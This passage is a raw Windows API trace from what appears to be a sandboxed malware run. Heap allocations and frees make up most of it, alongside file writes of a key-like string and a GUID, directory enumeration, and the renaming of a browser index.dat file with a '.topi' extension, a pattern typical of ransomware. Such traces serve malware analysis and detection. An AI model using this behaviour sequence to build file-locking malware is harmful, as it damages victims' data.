dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0098.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0098.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0098.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5138 [0098.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a30 [0098.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0098.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0098.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0098.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0098.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0098.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0098.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5108 | out: hHeap=0x680000) returned 1 [0098.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5108 [0098.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0098.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0098.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0098.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0098.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0098.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0098.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0098.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0098.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0098.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191cf0 [0098.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5108 | out: hHeap=0x680000) returned 1 [0098.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0098.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0098.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0098.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0098.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0098.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0098.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191cf0 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5138 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5120 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50f0 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50d8 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fbda0 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0098.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0098.087] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x7ffb, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x7ffb, lpOverlapped=0x0) returned 1 [0098.088] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0098.088] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x8000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.088] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0098.088] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0098.088] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0098.088] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0098.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.088] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0098.088] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0098.088] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0098.088] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0098.088] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0098.088] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.088] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0098.089] CloseHandle (hObject=0x6a8) returned 1 [0098.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6040 [0098.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8d0) returned 0x31cf750 [0098.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0098.090] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat.topi")) returned 1 [0098.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.091] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.092] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UV0DUWVB", cAlternateFileName="")) returned 1 [0098.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6040 [0098.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6108 [0098.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa8) returned 0x3152ab8 [0098.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ee58 [0098.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x3134738 [0098.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6360 [0098.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0098.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317f0f8 | out: hHeap=0x680000) returned 1 [0098.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8210 | out: hHeap=0x680000) returned 1 [0098.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6298 | out: hHeap=0x680000) returned 1 [0098.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e61d0 | out: hHeap=0x680000) returned 1 [0098.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31621a8 | out: hHeap=0x680000) returned 1 [0098.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e61d0 [0098.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6108 | out: hHeap=0x680000) returned 1 [0098.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0098.092] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VGMTOI09", cAlternateFileName="")) returned 1 [0098.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6040 [0098.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6108 [0098.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6298 [0098.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6108 | out: hHeap=0x680000) returned 1 [0098.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0098.093] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VGMTOI09", cAlternateFileName="")) returned 0 [0098.093] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0098.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0098.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311eb98 | out: hHeap=0x680000) returned 1 [0098.093] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0098.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311eb98 [0098.093] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0098.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0098.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0098.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.097] HeapFree (in: hHeap=0x680000, 